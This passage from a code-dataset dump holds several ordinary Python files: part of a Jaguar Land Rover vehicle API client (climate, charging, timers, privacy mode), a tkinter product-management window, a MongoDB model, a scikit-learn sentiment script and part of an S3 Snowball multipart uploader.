\"application/vnd.wirelesscar.ngtp.if9.StartServiceConfiguration-v2+json\"\n reoff_data = self.authenticate_reoff(pin)\n\n return self.post(\"engineOff\", headers, reoff_data)\n\n def set_rcc_target_value(self, pin, target_value):\n \"\"\"Set Remote Climate Target Value (value between 31-57, 31 is LO 57 is HOT)\"\"\"\n headers = self.connection.head.copy()\n self.enable_provisioning_mode(pin)\n service_parameters = {\"key\": \"ClimateControlRccTargetTemp\",\n \"value\": \"%s\" % str(target_value),\n \"applied\": 1}\n self.post(\"settings\", headers, service_parameters)\n\n def preconditioning_start(self, target_temp):\n \"\"\"Start pre-conditioning for specified temperature (celsius)\"\"\"\n service_parameters = [{\"key\": \"PRECONDITIONING\",\n \"value\": \"START\"},\n {\"key\": \"TARGET_TEMPERATURE_CELSIUS\",\n \"value\": \"%s\" % target_temp}]\n\n return self._preconditioning_control(service_parameters)\n\n def preconditioning_stop(self):\n \"\"\"Stop climate preconditioning\"\"\"\n service_parameters = [{\"key\": \"PRECONDITIONING\",\n \"value\": \"STOP\"}]\n return self._preconditioning_control(service_parameters)\n\n def climate_prioritize(self, priority):\n \"\"\"Optimize climate controls for comfort or range\"\"\"\n service_parameters = [{\"key\": \"PRIORITY_SETTING\",\n \"value\": \"%s\" % priority}]\n return self._preconditioning_control(service_parameters)\n\n def _preconditioning_control(self, service_parameters):\n \"\"\"Control the climate preconditioning\"\"\"\n headers = self.connection.head.copy()\n headers[\"Accept\"] = \"application/vnd.wirelesscar.ngtp.if9.ServiceStatus-v5+json\"\n headers[\"Content-Type\"] = \"application/vnd.wirelesscar.ngtp.if9.PhevService-v1+json; charset=utf-8\"\n\n ecc_data = self.authenticate_ecc()\n ecc_data['serviceParameters'] = service_parameters\n\n return self.post(\"preconditioning\", headers, ecc_data)\n\n def charging_stop(self):\n \"\"\"Stop charging\"\"\"\n service_parameters = [{\"key\": \"CHARGE_NOW_SETTING\",\n \"value\": \"FORCE_OFF\"}]\n\n return self._charging_profile_control(\"serviceParameters\", service_parameters)\n\n def charging_start(self):\n \"\"\"Start charging\"\"\"\n service_parameters = [{\"key\": \"CHARGE_NOW_SETTING\",\n \"value\": \"FORCE_ON\"}]\n\n return self._charging_profile_control(\"serviceParameters\", service_parameters)\n\n def set_max_soc(self, max_charge_level):\n \"\"\"Set max state of charge in percentage\"\"\"\n service_parameters = [{\"key\": \"SET_PERMANENT_MAX_SOC\",\n \"value\": max_charge_level}]\n\n return self._charging_profile_control(\"serviceParameters\", service_parameters)\n\n def set_one_off_max_soc(self, max_charge_level):\n \"\"\"Set one off max state of charge in percentage\"\"\"\n service_parameters = [{\"key\": \"SET_ONE_OFF_MAX_SOC\",\n \"value\": max_charge_level}]\n\n return self._charging_profile_control(\"serviceParameters\", service_parameters)\n\n def add_departure_timer(self, index, year, month, day, hour, minute):\n \"\"\"Add a single departure timer with the specified index\"\"\"\n departure_timer_setting = {\"timers\": [\n {\"departureTime\": {\"hour\": hour, \"minute\": minute},\n \"timerIndex\": index, \"timerTarget\":\n {\"singleDay\": {\"day\": day, \"month\": month, \"year\": year}},\n \"timerType\": {\"key\": \"BOTHCHARGEANDPRECONDITION\", \"value\": True}}]}\n\n return self._charging_profile_control(\"departureTimerSetting\", departure_timer_setting)\n\n def add_repeated_departure_timer(self, index, schedule, hour, minute):\n \"\"\"Add repeated departure timer.\"\"\"\n departure_timer_setting = {\"timers\": [\n {\"departureTime\": {\"hour\": hour, \"minute\": minute},\n \"timerIndex\": index, \"timerTarget\":\n {\"repeatSchedule\": schedule},\n \"timerType\": {\"key\": \"BOTHCHARGEANDPRECONDITION\", \"value\": True}}]}\n\n return self._charging_profile_control(\"departureTimerSetting\", departure_timer_setting)\n\n def delete_departure_timer(self, index):\n \"\"\"Delete a single departure timer associated with the specified index\"\"\"\n departure_timer_setting = {\"timers\": [{\"timerIndex\": index}]}\n\n return self._charging_profile_control(\"departureTimerSetting\", departure_timer_setting)\n\n def add_charging_period(self, index, schedule, hour_from, minute_from, hour_to, minute_to):\n \"\"\"Add charging period\"\"\"\n tariff_settings = {\"tariffs\": [\n {\"tariffIndex\": index, \"tariffDefinition\": {\"enabled\": True,\n \"repeatSchedule\": schedule,\n \"tariffZone\": [\n {\"zoneName\": \"TARIFF_ZONE_A\",\n \"bandType\": \"PEAK\",\n \"endTime\": {\n \"hour\": hour_from,\n \"minute\": minute_from}},\n {\"zoneName\": \"TARIFF_ZONE_B\",\n \"bandType\": \"OFFPEAK\",\n \"endTime\": {\"hour\": hour_to,\n \"minute\": minute_to}},\n {\"zoneName\": \"TARIFF_ZONE_C\",\n \"bandType\": \"PEAK\",\n \"endTime\": {\"hour\": 0,\n \"minute\": 0}}]}}]}\n\n return self._charging_profile_control(\"tariffSettings\", tariff_settings)\n\n def _charging_profile_control(self, service_parameter_key, service_parameters):\n \"\"\"Charging profile API\"\"\"\n headers = self.connection.head.copy()\n headers[\"Accept\"] = \"application/vnd.wirelesscar.ngtp.if9.ServiceStatus-v5+json\"\n headers[\"Content-Type\"] = \"application/vnd.wirelesscar.ngtp.if9.PhevService-v1+json; charset=utf-8\"\n\n cp_data = self.authenticate_cp()\n cp_data[service_parameter_key] = service_parameters\n\n return self.post(\"chargeProfile\", headers, cp_data)\n\n def set_wakeup_time(self, wakeup_time):\n \"\"\"Set the wakeup time for the specified time (epoch milliseconds)\"\"\"\n swu_data = self.authenticate_swu()\n swu_data[\"serviceCommand\"] = \"START\"\n swu_data[\"startTime\"] = wakeup_time\n return self._swu(swu_data)\n\n def delete_wakeup_time(self):\n \"\"\"Stop the wakeup time\"\"\"\n swu_data = self.authenticate_swu()\n swu_data[\"serviceCommand\"] = \"END\"\n return self._swu(swu_data)\n\n def _swu(self, swu_data):\n \"\"\"Set the wakeup time for the specified time (epoch milliseconds)\"\"\"\n headers = self.connection.head.copy()\n headers[\"Accept\"] = \"application/vnd.wirelesscar.ngtp.if9.ServiceStatus-v3+json\"\n headers[\"Content-Type\"] = \"application/vnd.wirelesscar.ngtp.if9.StartServiceConfiguration-v3+json; charset=utf-8\"\n return self.post(\"swu\", headers, swu_data)\n\n def enable_provisioning_mode(self, pin):\n \"\"\"Enable provisioning mode \"\"\"\n self._prov_command(pin, None, \"provisioning\")\n\n def enable_service_mode(self, pin, expiration_time):\n \"\"\"Enable service mode. Will disable at the specified time (epoch millis)\"\"\"\n return self._prov_command(pin, expiration_time, \"protectionStrategy_serviceMode\")\n\n def enable_transport_mode(self, pin, expiration_time):\n \"\"\"Enable transport mode. Will be disabled at the specified time (epoch millis)\"\"\"\n return self._prov_command(pin, expiration_time, \"protectionStrategy_transportMode\")\n\n def enable_privacy_mode(self, pin):\n \"\"\"Enable privacy mode. Will disable journey logging\"\"\"\n return self._prov_command(pin, None, \"privacySwitch_on\")\n\n def disable_privacy_mode(self, pin):\n \"\"\"Disable privacy mode. Will enable journey logging\"\"\"\n return self._prov_command(pin, None, \"privacySwitch_off\")\n\n def _prov_command(self, pin, expiration_time, mode):\n \"\"\"Send prov endpoint commands. Used for service/transport/privacy mode\"\"\"\n headers = self.connection.head.copy()\n headers[\"Content-Type\"] = \"application/vnd.wirelesscar.ngtp.if9.StartServiceConfiguration-v3+json\"\n prov_data = self.authenticate_prov(pin)\n\n prov_data[\"serviceCommand\"] = mode\n prov_data[\"startTime\"] = None\n prov_data[\"endTime\"] = expiration_time\n\n return self.post(\"prov\", headers, prov_data)\n\n def _authenticate_vhs(self):\n \"\"\"Authenticate to vhs and get token\"\"\"\n return self._authenticate_empty_pin_protected_service(\"VHS\")\n\n def _authenticate_empty_pin_protected_service(self, service_name):\n data = {\n \"serviceName\": service_name,\n \"pin\": \"\"}\n headers = self.connection.head.copy()\n headers[\"Content-Type\"] = \"application/vnd.wirelesscar.ngtp.if9.AuthenticateRequest-v2+json; charset=utf-8\"\n\n return self.post(\"users/%s/authenticate\" % self.connection.user_id, headers, data)\n\n def authenticate_hblf(self):\n \"\"\"Authenticate to hblf\"\"\"\n return self._authenticate_vin_protected_service(\"HBLF\")\n\n def authenticate_ecc(self):\n \"\"\"Authenticate to ecc\"\"\"\n return self._authenticate_vin_protected_service(\"ECC\")\n\n def authenticate_cp(self):\n \"\"\"Authenticate to cp\"\"\"\n return self._authenticate_vin_protected_service(\"CP\")\n\n def authenticate_swu(self):\n \"\"\"Authenticate to swu\"\"\"\n return self._authenticate_empty_pin_protected_service(\"SWU\")\n\n def _authenticate_vin_protected_service(self, service_name):\n \"\"\"Authenticate to specified service and return associated token\"\"\"\n data = {\n \"serviceName\": \"%s\" % service_name,\n \"pin\": \"%s\" % self.vin[-4:]}\n headers = self.connection.head.copy()\n headers[\"Content-Type\"] = \"application/vnd.wirelesscar.ngtp.if9.AuthenticateRequest-v2+json; charset=utf-8\"\n\n return self.post(\"users/%s/authenticate\" % self.connection.user_id, headers, data)\n\n def authenticate_rdl(self, pin):\n \"\"\"Authenticate to rdl\"\"\"\n return self._authenticate_pin_protected_service(pin, \"RDL\")\n\n def authenticate_rdu(self, pin):\n \"\"\"Authenticate to rdu\"\"\"\n return self._authenticate_pin_protected_service(pin, \"RDU\")\n\n def authenticate_aloff(self, pin):\n \"\"\"Authenticate to aloff\"\"\"\n return self._authenticate_pin_protected_service(pin, \"ALOFF\")\n\n def authenticate_reon(self, pin):\n \"\"\"Authenticate to reon\"\"\"\n return self._authenticate_pin_protected_service(pin, \"REON\")\n\n def authenticate_reoff(self, pin):\n \"\"\"Authenticate to reoff\"\"\"\n return self._authenticate_pin_protected_service(pin, \"REOFF\")\n\n def authenticate_prov(self, pin):\n \"\"\"Authenticate to PROV service\"\"\"\n return self._authenticate_pin_protected_service(pin, \"PROV\")\n\n def _authenticate_pin_protected_service(self, pin, service_name):\n \"\"\"Authenticate to specified service with the provided PIN\"\"\"\n data = {\n \"serviceName\": \"%s\" % service_name,\n \"pin\": \"%s\" % pin}\n headers = self.connection.head.copy()\n headers[\"Content-Type\"] = \"application/vnd.wirelesscar.ngtp.if9.AuthenticateRequest-v2+json; charset=utf-8\"\n\n return self.post(\"users/%s/authenticate\" % self.connection.user_id, headers, data)\n\n def post(self, command, headers, data):\n \"\"\"Utility command to post data to VHS\"\"\"\n return self.connection.post(command, '%s/vehicles/%s' % (IF9_BASE_URL, self.vin),\n headers, data)\n\n def get(self, command, headers):\n \"\"\"Utility command to get vehicle data from API\"\"\"\n return self.connection.get(command, '%s/vehicles/%s' % (IF9_BASE_URL, self.vin), headers)\n","repo_name":"smar000/jlr2mqtt","sub_path":"jlrpy.py","file_name":"jlrpy.py","file_ext":"py","file_size_in_byte":24760,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"} +{"seq_id":"34713530847","text":"from itertools import count\nfrom os import X_OK\nfrom tkinter import *\nfrom tkinter import ttk\nfrom datetime import *\nfrom time import strftime\nfrom PIL import ImageTk, Image\nfrom tkcalendar import DateEntry\nimport sqlite3\n# from functions import *\nimport signin\nimport dashboard\nimport products\nimport sales\nimport customers\nimport addproduct\nimport addcustomer\nimport addsales\n\nclass Products:\n def __init__(self, window):\n self.window = window\n width = 800\n height = 500\n sw = self.window.winfo_screenwidth()\n sh = self.window.winfo_screenheight()\n x = (sw/5)\n y = (sh/11)\n self.window.geometry(f'{width}x{height}+{int(x)}+{int(y)}')\n self.window.title('TCP Management | Products page')\n self.window.configure(bg='#f7f3f2')\n self.window.wm_iconbitmap('FMCG.ico')\n self.window.resizable(0, 0)\n\n # Database\n def SalesData():\n db = sqlite3.connect('GLBL.db')\n cursor = db.cursor()\n cursor.execute('select * from products')\n records = cursor.fetchall()\n \n global count\n count = 0\n for record in records:\n SalesView.insert(parent='', index='end', iid=count, values=(record[0], \n record[1], record[2], record[3])) \n count = count + 1\n\n db.commit()\n db.close()\n\n\n\n # First Frame & Menu\n MenuFrame = Frame(window)\n MenuFrame.pack(fill=X, expand='no')\n\n Menu = Button(MenuFrame, text = 'Overview', bd=0, cursor='hand2', activebackground='green', activeforeground='white', font=('roboto', 9, 'bold'), command=self.dashb)\n Menu.grid(row=0, column=0, padx=5, pady=10)\n DivLine = Frame(MenuFrame, height=15, width=1, bg='red')\n DivLine.grid(row=0,column=1, pady=10)\n\n Menu2 = Button(MenuFrame, text = 'Products', bd=0, cursor='hand2', activebackground='green', activeforeground='white', font=('roboto', 9, 'bold'), command=self.prod)\n Menu2.grid(row=0, column=2, padx=5, pady=10)\n DivLine = Frame(MenuFrame, height=15, width=1, bg='red')\n DivLine.grid(row=0,column=3, pady=10)\n\n Menu3 = Button(MenuFrame, text = 'Sales', bd=0, cursor='hand2', activebackground='green', activeforeground='white', font=('roboto', 9, 'bold'), command=self.saless)\n Menu3.grid(row=0, column=4, padx=5, pady=10)\n DivLine = Frame(MenuFrame, height=15, width=1, bg='red')\n DivLine.grid(row=0,column=5, pady=10)\n\n Menu4 = Button(MenuFrame, text = 'Customers', bd=0, cursor='hand2', activebackground='green', activeforeground='white', font=('roboto', 9, 'bold'), command=self.cus)\n Menu4.grid(row=0, column=6, padx=5, pady=10)\n DivLine = Frame(MenuFrame, height=15, width=1, bg='red')\n DivLine.grid(row=0,column=7, pady=10)\n\n Menu5 = Button(MenuFrame, text = 'Vendors', bd=0, cursor='hand2', activebackground='green', activeforeground='white', font=('roboto', 9, 'bold'))\n Menu5.grid(row=0, column=8, padx=5, pady=10)\n DivLine = Frame(MenuFrame, height=15, width=1, bg='red')\n DivLine.grid(row=0,column=9, pady=10)\n\n Menu6 = Button(MenuFrame, text = 'Inventory', bd=0, cursor='hand2', activebackground='green', activeforeground='white', font=('roboto', 9, 'bold'))\n Menu6.grid(row=0, column=10, padx=5, pady=10)\n DivLine = Frame(MenuFrame, height=15, width=1, bg='red')\n DivLine.grid(row=0,column=11, pady=10)\n\n Menu7 = Button(MenuFrame, text = 'Expenses', bd=0, cursor='hand2', activebackground='green', activeforeground='white', font=('roboto', 9, 'bold'))\n Menu7.grid(row=0, column=12, padx=5, pady=10)\n DivLine = Frame(MenuFrame, height=15, width=1, bg='red')\n DivLine.grid(row=0,column=13, pady=10)\n\n Menu9 = Button(MenuFrame, text = 'Log Out', bd=0, cursor='hand2', activebackground='green', activeforeground='white', font=('roboto', 9, 'bold'), command=self.logout)\n Menu9.grid(row=0, column=14, padx=5, pady=10)\n DivLine = Frame(MenuFrame, height=15, width=1, bg='red')\n DivLine.grid(row=0,column=15, pady=10)\n\n\n Date = datetime.now()\n Menu10 = Label(MenuFrame, text=f\"{Date:%A, %B, %d, %Y}\", font=('roboto', 9, 'bold'), bg='green', fg='white')\n Menu10.grid(row=0, column=17, padx=5, pady=10)\n Time = strftime('%I:%M:%S')\n Menu11 = Label(MenuFrame, text=Time, font=('roboto', 9, 'bold'), bg='green', fg='white')\n Menu11.grid(row=0, column=18, pady=10)\n Menu11.after(1000, time)\n\n # Second Frames & Menu\n SideFrame = LabelFrame(window, height=300, width=150)\n SideFrame.pack(fill=Y, expand='no', anchor=W, padx=10, pady=40)\n\n\n SideMenu = Button(SideFrame, text='Add Product', font=('roboto', 9, 'bold'), bg='#d11c03', fg='white', bd=0, cursor='hand2', activebackground='#d11c03', activeforeground='white', command=self.addp)\n SideMenu.grid(row=0, column=0, padx=10, pady=7)\n\n\n\n # Center Frames & Labels\n Sales = LabelFrame(window, text=\"Our Products\", height=275, width=648, font=('roboto', 9, 'bold'), fg='green')\n Sales.pack(fill=X, expand='no')\n Sales.place(x=130, y=75)\n\n Style = ttk.Style()\n Style.theme_use('clam')\n Style.configure('Treeview',\n font=('roboto', 10, 'bold'),\n background='#f7f3f2',\n rowheight=20,\n activebackground=\"#81C44C\")\n\n Style.map('Treeview', background=[('selected', 'green')])\n # #bd2505\n\n Tscroll = Scrollbar(Sales, orient='vertical')\n Tscroll.pack(side=RIGHT, fill=Y)\n\n SalesView = ttk.Treeview(Sales, yscrollcommand=Tscroll.set, selectmode='extended')\n SalesView.pack(pady=10, padx=10)\n Tscroll.configure(command=SalesView.yview)\n SalesView['columns'] = ('PID', 'PRODUCT NAME', 'UNIT', 'DATE')\n\n SalesView.column('#0', width=0, stretch=NO)\n SalesView.column('PID', anchor=CENTER, width=70)\n SalesView.column('PRODUCT NAME', anchor=CENTER, width=140)\n SalesView.column('UNIT', anchor=CENTER, width=120)\n SalesView.column('DATE', anchor=CENTER, width=75)\n \n\n SalesView.heading('#0', text='', anchor=CENTER)\n SalesView.heading('PID', text='PID', anchor=CENTER)\n SalesView.heading('PRODUCT NAME', text='PRODUCT NAME', anchor=CENTER)\n SalesView.heading('UNIT', text='UNIT', anchor=CENTER)\n SalesView.heading('DATE', text='DATE', anchor=CENTER)\n\n LiveUp = Label(window, text='Products Live Updates', font=('roboto', 10, 'bold'), bg='#d11c03', fg='white')\n LiveUp.place(x=617, y=82)\n\n LiveUpF = LabelFrame(window, text='', width=190, height=226)\n LiveUpF.pack(fill=Y, expand='no', side=RIGHT)\n LiveUpF.place(x=600, y=115)\n\n PEX = Label(LiveUpF, text='Product: Quantity Produced', font=('roboto', 10, 'bold')).place(x=1, y=2)\n\n PP1 = Label(LiveUpF, text='Product 1:', font=('roboto', 10, 'bold'), fg='green').place(x=5, y=30)\n PP2 = Label(LiveUpF, text='Product 2:', font=('roboto', 10, 'bold'), fg='green').place(x=5, y=50)\n PP3 = Label(LiveUpF, text='Product 3:', font=('roboto', 10, 'bold'), fg='green').place(x=5, y=70)\n PP4 = Label(LiveUpF, text='Product 4:', font=('roboto', 10, 'bold'), fg='green').place(x=5, y=90)\n PP5 = Label(LiveUpF, text='Product 5:', font=('roboto', 10, 'bold'), fg='green').place(x=5, y=110)\n PP6 = Label(LiveUpF, text='Product 6:', font=('roboto', 10, 'bold'), fg='green').place(x=5, y=130)\n PPR1 = Label(LiveUpF, text='120000', font=('roboto', 10, 'bold')).place(x=80, y=30)\n PPR2 = Label(LiveUpF, text='130000', font=('roboto', 10, 'bold')).place(x=80, y=50)\n PPR3 = Label(LiveUpF, text='140000', font=('roboto', 10, 'bold')).place(x=80, y=70)\n PPR4 = Label(LiveUpF, text='150000', font=('roboto', 10, 'bold')).place(x=80, y=90)\n PPR5 = Label(LiveUpF, text='160000', font=('roboto', 10, 'bold')).place(x=80, y=110)\n PPR6 = Label(LiveUpF, text='170000', font=('roboto', 10, 'bold')).place(x=80, y=130)\n \n\n # SrcDate = DateEntry(window, selectmode='day')\n # SrcDate.place(x=140, y=370)\n\n # SrcBtn = Button(window, text='Search', font=('roboto', 10, 'bold'), bg='green', fg='white', cursor='hand2', command=src)\n # SrcBtn.place(x=260, y=365)\n\n\n SalesData()\n\n\n def dashb(self):\n win = Toplevel()\n dashboard.Dashboard(win)\n self.window.withdraw()\n win.deiconify()\n\n def prod(self):\n win = Toplevel()\n products.Products(win)\n self.window.withdraw()\n win.deiconify()\n\n def saless(self):\n win = Toplevel()\n sales.Sales(win)\n self.window.withdraw()\n win.deiconify()\n\n def cus(self):\n win = Toplevel()\n customers.Customers(win)\n self.window.withdraw()\n win.deiconify()\n\n def addp(self):\n win = Toplevel()\n addproduct.AddProduct(win)\n self.window.withdraw()\n win.deiconify()\n\n def addc(self):\n win = Toplevel()\n addcustomer.AddCustomer(win)\n self.window.withdraw()\n win.deiconify()\n\n def adds(self):\n win = Toplevel()\n addsales.AddSales(win)\n self.window.withdraw()\n win.deiconify()\n \n def logout(self):\n win = Toplevel()\n signin.Signin(win)\n self.window.withdraw()\n win.deiconify()\n\ndef products():\n window = Tk()\n Products(window)\n window.mainloop()\n\nif __name__ == '__main__':\n products()","repo_name":"GbolahanAlaba/GLBL","sub_path":"products.py","file_name":"products.py","file_ext":"py","file_size_in_byte":9719,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"33447955943","text":"from bson.objectid import ObjectId\nfrom .modal import Modal\n\n\nclass LoveModal(Modal):\n def __init__(self) -> None:\n super().__init__(collectionName=\"loves\", validator={\n '$jsonSchema': {\n 'bsonType': 'object',\n 'title': \"Loves Object Validation\",\n 'required': ['user_id', 'post_id'],\n 'properties': {\n 'user_id': {\n 'bsonType': 'string',\n 'description': \"'user_id' must be a string and is required\"\n },\n 'post_id': {\n 'bsonType': 'string',\n 'description': \"'post_id' must be a string and is required\"\n },\n }\n }\n })\n\n def readAll(self, userId: str):\n \"\"\"\n Return all the loves that a paticular user did\n :userId str: The id of the user\n :return: object\n \"\"\"\n data = self.collection.find({'user_id': userId})\n return data\n\n def readAllLoves(self, postId: str):\n \"\"\"\n Return all the loves on a paticular post\n :postId: The id of the post\n :return: object\n \"\"\"\n data = self.collection.find({'user_id': postId})\n return data\n\n def isUserLovedPost(self, userId: str, postId: str) -> bool:\n loveData = self.read({'user_id': userId, 'post_id': postId})\n if loveData is not None:\n return True\n return False\n","repo_name":"Uday-lal/insta_clone","sub_path":"server/model/loveModal.py","file_name":"loveModal.py","file_ext":"py","file_size_in_byte":1519,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"6685952785","text":"from sklearn.feature_extraction.text import CountVectorizer\r\nfrom sklearn.feature_extraction.text import TfidfTransformer\r\nfrom sklearn.naive_bayes import MultinomialNB\r\nfrom sklearn.pipeline import Pipeline\r\nimport pickle\r\nimport mysql.connector\r\nimport json\r\n\r\nmydb = mysql.connector.connect(\r\n host=\"localhost\",\r\n user=\"root\",\r\n passwd=\"\",\r\n database=\"project\"\r\n)\r\n\r\n## TOKENIZING\r\ncount_vect = CountVectorizer()\r\nfilobjek=open(\"sklearn_try/train_data\",'rb')\r\ntrain_data=pickle.load(filobjek)\r\nX_train_counts = count_vect.fit_transform(train_data)\r\n# print(train_data)\r\n\r\n## TF TRANSFORMER\r\nfilobjek=open(\"sklearn_try/train_count\",'rb')\r\ntrain_count=pickle.load(filobjek)\r\ntf_transformer = TfidfTransformer().fit(train_count)\r\n# print(train_count)\r\n\r\ntest_data=list()\r\nmycursor = mydb.cursor()\r\nmycursor.execute(\"SELECT * FROM data_crawling_baru\")\r\nmyresult = mycursor.fetchall()\r\nfor id_crawl,konten,id_tes in myresult:\r\n test_data.append(konten)\r\n\r\nfilobjek=open(\"sklearn_try/model_train\",'rb')\r\nclff=pickle.load(filobjek)\r\nX_new_counts = count_vect.transform(test_data)\r\nX_new_tf = tf_transformer.transform(X_new_counts)\r\npredicted = clff.predict(X_new_tf)\r\n\r\nsentimen=list()\r\nfor doc, category in zip(test_data, predicted):\r\n # print('%r => %s' % (doc, category))\r\n sentimen.append(category)\r\n\r\npos=0\r\nneg=0\r\nfor status in sentimen:\r\n if status==\"positif\":\r\n pos=pos+1\r\n elif status==\"negatif\":\r\n neg=neg+1\r\n\r\n\r\nhasil_sentimen={\"positif\":pos,\"negatif\":neg}\r\njson_sentimen=json.dumps(hasil_sentimen)\r\nprint(json_sentimen)","repo_name":"ahmadhafidh/analysis-of-sentiment-ranking-and-rating-apps","sub_path":"sklearn_try/try_new_datasentimen.py","file_name":"try_new_datasentimen.py","file_ext":"py","file_size_in_byte":1560,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"} +{"seq_id":"36802178816","text":"#-*- encoding: utf8 -*-\n'''\nstatus: failed\nversion: v11\nway: using multi-part uploading\nref: https://gist.github.com/teasherm/bb73f21ed2f3b46bc1c2ca48ec2c1cf5\nchangelog:\n - 2020.02.19\n - adding fifo operation to reducing for big file which is over max_part_size \n - removing tarfiles_one_time logic\n - spliting buffer by max_part_size\n - 2020.02.18:\n - supprt snowball limit:\n - max_part_size: 512mb\n - min_part_size: 5mb\n - 2020.02.14: \n - modifying for python3 \n - support korean in Windows\n - 2020.02.12: adding features \n - gen_filelist by size\n - 2020.02.10: changing filename from tar_to_s3_v7_multipart.py to snowball_uploader_8.py\n - adding features which can split tar file by size and count.\n - adding feature which create file list\n - showing help message\n'''\n\nimport boto3\nimport tarfile\nimport io\nimport os.path\nfrom datetime import datetime\nimport sys\nimport shutil\n\nbucket_name = \"your-own-dest-seoul\"\ns3 = boto3.client('s3', endpoint_url='https://s3.ap-northeast-2.amazonaws.com')\n#s3 = boto3.client('s3', region_name='ap-northeast-2', endpoint_url='https://s3.ap-northeast-2.amazonaws.com', aws_access_key_id=None, aws_secret_access_key=None)\n#tarfiles_one_time = 1000\nmax_size = 100 * 1000 ** 2 # 70GB\nmax_part_size = 20 * 1024 ** 2 # 100MB\nmin_part_size = 5 * 1024 ** 2 # 5MB\ntarget_path = '.' ## very important!! change to your source directory\nif os.name == 'nt':\n filelist_dir = \"C:/tmp/fl_logdir_dkfjpoiwqjefkdjf/\" #for windows\nelse:\n filelist_dir = '/tmp/fl_logdir_dkfjpoiwqjefkdjf/' #for linux\n\n#source_file = ''\n\n## Caution: you have to modify rename_file function to fit your own naming rule\n#def rename_file(org_file):\n# return org_file.replace('\\n','') + \"_new_buffer\"\n#org_files_list = open(source_file).readlines()\n#target_files_list = list(map(rename_file, org_files_list))\n## to use same name (org file name == target file name), uncomment below line\n#target_files_list = org_files_list\n\n#### don't need to modify from here\ncurrent_time = datetime.now().strftime(\"%Y%m%d_%H%M%S\")\n#key_name = ('snowball-batch-%s-%s.tar' % (source_file, current_time))\n#key_name = ('snowball-batch-%s.tar' % ( current_time))\n\nparts = []\n#s3_location = \"s3://\" + bucket_name + \"/\" + batch_tar\n\ndef gen_filelist():\n sum_size = 0\n fl_prefix = 'fl_'\n fl_index = 1\n shutil.rmtree(filelist_dir,ignore_errors=True)\n try:\n os.mkdir(filelist_dir)\n except: pass\n print('generating file list by size %s bytes' % max_size)\n for r,d,f in os.walk(target_path):\n for file in f:\n file_name = os.path.join(r,file)\n fl_name = filelist_dir + '/' + fl_prefix + str(fl_index) + \".txt\"\n sum_size = sum_size + os.path.getsize(file_name)\n if max_size < sum_size:\n fl_index = fl_index + 1 \n sum_size = 0\n print('%s' % file_name)\n with open(fl_name, 'a', encoding='utf8') as fl_content:\n fl_content.write(file_name + '\\n') \n print('file lists are generated!!')\n print('check %s' % filelist_dir)\n return os.listdir(filelist_dir)\n\n#def add_metadata_to_s3(bucket_name, key_name):\n# s3.copy_object(Key=key_name, Bucket=bucket_name,\n# CopySource={\"Bucket\": bucket_name, \"Key\": key_name},\n# Metadata={\"snowball-auto-extract\": \"true\"},\n# MetadataDirective=\"REPLACE\")\ndef log_error(org_file, str_suffix):\n with open(error_file,'a+', encoding='utf8') as err:\n err.write(org_file + str_suffix)\ndef log_success(target_file, str_suffix):\n with open(successlog_file,'a+', encoding='utf8') as success:\n success.write(target_file + str_suffix)\n\n#def flush_mem(out):\n# out.seek(0)\n# out.truncate()\n\ndef create_mpu():\n mpu = s3.create_multipart_upload(Bucket=bucket_name, Key=key_name, Metadata={\"snowball-auto-extract\": \"true\"})\n mpu_id = mpu[\"UploadId\"]\n return mpu_id\n\ndef upload_mpu(mpu_id, data, index):\n #part = s3.upload_part(Body=data, Bucket=bucket_name, Key=key_name, UploadId=mpu_id, PartNumber=index, ContentLength=max_buf_size)\n part = s3.upload_part(Body=data, Bucket=bucket_name, Key=key_name, UploadId=mpu_id, PartNumber=index)\n parts.append({\"PartNumber\": index, \"ETag\": part[\"ETag\"]})\n #print ('parts list: %s' % str(parts))\n return parts\n\ndef complete_mpu(mpu_id, parts):\n result = s3.complete_multipart_upload(\n Bucket=bucket_name,\n Key=key_name,\n UploadId=mpu_id,\n MultipartUpload={\"Parts\": parts})\n return result\n\ndef copy_to_snowball(org_files_list, target_files_list):\n recv_buf = io.BytesIO()\n mpu_id = create_mpu()\n parts_index = 1\n with tarfile.open(fileobj=recv_buf, mode=\"w\") as tar:\n for index in range(len(org_files_list)):\n org_file = org_files_list[index].replace('\\n','')\n target_file = target_files_list[index].replace('\\n','')\n print ('\\n########################')\n print ('0. program is starting')\n if os.path.isfile(org_file):\n tar.add(org_file, arcname=target_file)\n print ('1. %s is archiving\\n' % target_file )\n print ('1. recv_buf size: %s' % len(recv_buf.getvalue()))\n log_success(target_file, \" is archived successfully\\n\")\n ###################\n print ('%s is uploading\\n' % key_name )\n print (\"2. recv_buf pos: %s\" % recv_buf.tell())\n recv_buf_size = recv_buf.tell()\n cur_pos = 0\n if recv_buf_size > max_part_size:\n print('max file is checked')\n print('3.big recv_buf size: %s' % recv_buf_size)\n print('3.big recv_buf pos : %s' % recv_buf.tell())\n while recv_buf_size > max_part_size:\n print('4.sending big : %s' % recv_buf.tell())\n recv_buf.seek(0,0)\n mpu_parts = upload_mpu(mpu_id, recv_buf.read(max_part_size), parts_index)\n parts_index += 1\n print('4.sent big : %s' % recv_buf.tell())\n tmp_buf = io.BytesIO() # added for FIFO operation\n tmp_buf.write(recv_buf.read()) # added for FIFO operation\n print('4.moved recv to tmp')\n recv_buf = tmp_buf\n #cur_pos = cur_pos + max_part_size + 1\n print('4.1.big recv_buf pos: %s' % recv_buf.tell())\n print('4.2.big recv_buf size: %s' % len(recv_buf.getvalue()))\n recv_buf_size = recv_buf.tell()\n if recv_buf_size >= min_part_size:\n recv_buf.seek(0,0)\n print('5.sending big-small peek : %s' % recv_buf.peek())\n mpu_parts = upload_mpu(mpu_id, recv_buf.read(max_part_size), parts_index)\n parts_index += 1\n recv_buf.truncate(0)\n print('5.big-small recv_buf size: %s' % len(recv_buf.getvalue()))\n print('5.big-small recv_buf pos : %s' % recv_buf.tell())\n else:\n print('6 remaining buf of big is %s' % recv_buf_size )\n #spared_buf_size = recv_buf_size\n #pass\n else:\n #if spared_buf_size:\n # cur_pos = spared_buf_size * -1\n if recv_buf_size < min_part_size:\n print('7. normal recev buffer should be passed')\n print('7.1 recv_buf size: %s' % len(recv_buf.getvalue()))\n print('7.2 recv_buf pos : %s' % recv_buf.tell())\n #recv_buf.seek(0,0)\n #mpu_parts = 